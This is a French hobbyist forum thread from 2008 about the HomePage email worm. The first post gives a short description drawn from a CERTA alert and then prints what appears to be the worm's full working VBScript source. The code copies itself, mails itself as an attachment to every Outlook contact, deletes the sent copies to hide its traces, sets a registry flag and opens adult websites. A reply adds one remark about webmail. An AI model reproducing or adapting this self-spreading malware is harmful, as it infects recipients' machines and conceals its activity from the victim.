le virus homepage

Moderator: Mod

le virus homepage

Postby habbo3 » Sun Apr 13, 2008 6:52 am

[i:b95d206d98]Publié à titre informatif uniquement.[/i:b95d206d98]

[b:b95d206d98]Mécanisme de contamination [/b:b95d206d98]

HomePage est un virus qui utilise le carnet d'adresse d'Outlook pour se répandre sur Internet.

Il modifie la base de registres en modifiant la clé : HKEY_LOCAL_MACHINE\Software\An\Mailed\

Il modifie également les paramètres du navigateur afin de faire afficher un site « pour adultes » lors de l'ouverture de ce dernier.

Le message contenant le virus se compose comme suit :

* Objet : Homepage
* Texte :

Hi !

You've got to see this page! It's really cool ;O)
* Pièce jointe : homepage.HTML.vbs

[b:b95d206d98]Risque [/b:b95d206d98]

* Le risque est élevé si les utisateurs ne sont pas sensibilisés ;
* Prolifération de virus ;
* Mode de propagation par messagerie.

[b:b95d206d98]Systeme[/b:b95d206d98]

Systèmes Windows utilisant la messagerie Outlook.

[b:b95d206d98]Langage[/b:b95d206d98]
VBS

[i:b95d206d98]source (http://www.certa.ssi.gouv.fr/site/CERTA-2001-ALE-006/)[/i:b95d206d98]

[code:1:b95d206d98]On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://www.***.htm")
elseif r=2 Then
WS.Run("http://www.***.htm")
elseif r=3 Then
WS.Run("http://www.***.htm")
ElseIf r=4 Then
WS.Run("http://www.***.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
Set Mapi=Outlook.GetNameSpace("MAPI")
Set Lists=Mapi.AddressLists
For Each ListIndex In Lists
If ListIndex.AddressEntries.Count <> 0 Then
ContactCount = ListIndex.AddressEntries.Count
For Count= 1 To ContactCount
Set Mail = Outlook.CreateItem(0)
Set Contact = ListIndex.AddressEntries(Count)
Mail.To = Contact.Address
Mail.Subject = "Homepage"
Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've got to see this page!
It's really cool ;O)"&vbcrlf&vbcrlf
Set Attachment=Mail.Attachments
Attachment.Add Folder & "\homepage.HTML.vbs"
Mail.DeleteAfterSubmit = True
If Mail.To <> "" Then
Mail.Send
WS.regwrite "HKCU\software\An\mailed", "1"
End If
Next
End If
Next
End if
End Function[/code:1:b95d206d98][list:b95d206d98][/list:u:b95d206d98]
User avatar
habbo3
Projets
 
Posts: 123
Joined: Mon Feb 11, 2008 6:59 pm

Postby ANTPIRG » Sat Aug 30, 2008 3:11 pm

moi je n'envoie pas mes e-mail par outlook mais en me connectant au site de mon FAI .
ANTPIRG
Projets
 
Posts: 132
Joined: Sat Aug 30, 2008 10:22 am


Return to Virologie informatique

Who is online

Users browsing this forum: No registered users and 0 guests

cron